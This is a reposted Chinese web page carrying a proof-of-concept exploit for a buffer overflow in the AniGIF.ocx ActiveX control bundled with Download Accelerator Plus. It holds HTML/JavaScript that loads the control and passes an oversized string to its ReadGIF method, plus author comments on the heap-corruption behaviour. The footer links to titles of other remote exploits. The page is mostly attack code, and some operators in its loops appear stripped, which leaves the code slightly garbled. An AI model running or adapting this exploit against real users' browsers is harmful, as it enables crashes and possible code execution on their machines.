Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC

日期:2013/11/22 18:52:00 来源:本网整理 阅读:39
点评:<html> <body> <object classid='clsid:82351441-9094-11D1-A24B-00A0C932C7DF' id='target' /> </object> <script language=javascript> // anigif.ocx by www.jcomsoft.com can be found distribuite < id="con_ad1"> < id="con_ad8"> <html>
<body>
<object classid='clsid:82351441-9094-11D1-A24B-00A0C932C7DF' id='target' />
</object>
<script language=javascript>

// anigif.ocx by www.jcomsoft.com can be found distribuited with some applications,
// I found it in Download Accelerator Plus 6.8.
// DAP comes with an old version, but the last from jcomsoft is also vulnerable:
// there's a stack-based buffer overflow in the ReadGIF and ReadGIF2 methods,
// the funny thing is that after the first exception that will be handled by IE,
// when the object is released we reach RtlpCoalesceFreeBlocks owning eax and ecx
// with windogs xp sp1 or the second check of safe-unlink with sp2 in a standard heap
// overflow scenario.

var buf;
for (var i=0; i<259; i ) buf = "X";

buf ="BBBB";
buf = "CCCC";

for (var i=0; i<5728; i ) buf = "H";

target.ReadGIF(buf);

window.location = "http://www.google.com";

</script>
</body>
</html>

  • 本文相关:
  • Sun xVM VirtualBox
  • Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
  • LoveCMS 1.6.2 Final Update Settings Remote Exploit
  • TGS CMS 0.3.2r2 Remote Code Execution Exploit
  • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)
  • LoveCMS 1.6.2 Final Remote Code Execution Exploit
  • Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
  • moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit
  • Joomla Component EZ Store Remote Blind SQL Injection Exploit
  • Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
  • 免责声明 - 关于我们 - 联系我们 - 广告联系 - 友情链接 - 帮助中心 - 频道导航
    Copyright © 2015 www.zgxue.com All Rights Reserved